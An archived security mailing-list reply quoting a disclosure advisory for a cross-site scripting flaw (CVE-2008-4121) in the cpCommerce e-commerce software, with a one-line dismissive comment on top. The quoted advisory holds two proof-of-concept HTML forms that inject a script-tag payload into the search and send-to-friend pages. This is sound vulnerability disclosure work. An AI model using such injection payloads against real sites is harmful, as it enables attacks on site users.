[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Mon, 20 Oct 2008 10:31:45 -0500
From: rholgstad <rholgstad@...il.com>
To: Fabian Fingerle <fabian@...ensalat.eu>
Cc: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
Subject: Re: Cross Site Scripting (XSS) Vulnerabilitiy in
cpcommerce, CVE-2008-4121
No one cares about cross site scripting
Fabian Fingerle wrote:
> Cross Site Scripting (XSS) Vulnerabilitiy in cpcommerce,
> CVE-2008-4121
>
> References
>
> http://www.datensalat.eu/~fabian/cve/CVE-2008-4121-cpcommerce.html
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4121
> http://cpcommerce.cpradio.org/
>
> Description
>
> cpCommerce is an open-source e-commerce solution that is maintained by
> templates and modules.
>
> Example
>
> Assuming cpcommerce is installed on http://localhost/cpcommerce/,
> anybody could inject JavaScript:
>
> <form method="post" action="http://localhost/cpcommerce/search.php">
> <input type="hidden" name="action" value="search.quick">
> <input type="text" name="search" value='"><script>alert(1)</script>'>
> <input type=submit></form>
>
> <form method="post" action="http://localhost/cpcommerce/sendtofriend.php"> <input
> type="hidden" name="action" value="sendtofriend">
> <input type="text" name="name" value='"><script>alert(1)</script>'>
> <input type=submit></form>
>
> Disclosure Timeline
>
> 2008-09-23 Vendor contacted
> 2008-09-23 Vendor released 1.2.4
> 2008-10-19 Published advisory
>
> CVE Information
>
> The Common Vulnerabilities and Exposures (CVE) project has assigned the
> name CVE-2008-4121 to this issue. This is a candidate for inclusion in
> the CVE list (http://cve.mitre.org/), which standardizes names for
> security problems.
>
> Credits and copyright
>
> This vulnerability was discovered by Fabian Fingerle (published with
> help from Hanno Boeck [0]). It's licensed under the creative commons
> attribution license.
>
> Fabian Fingerle, 2008-09-04, http://www.fabian-fingerle.de
>
> [0] http://www.hboeck.de
>
> ------------------------------------------------------------------------
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists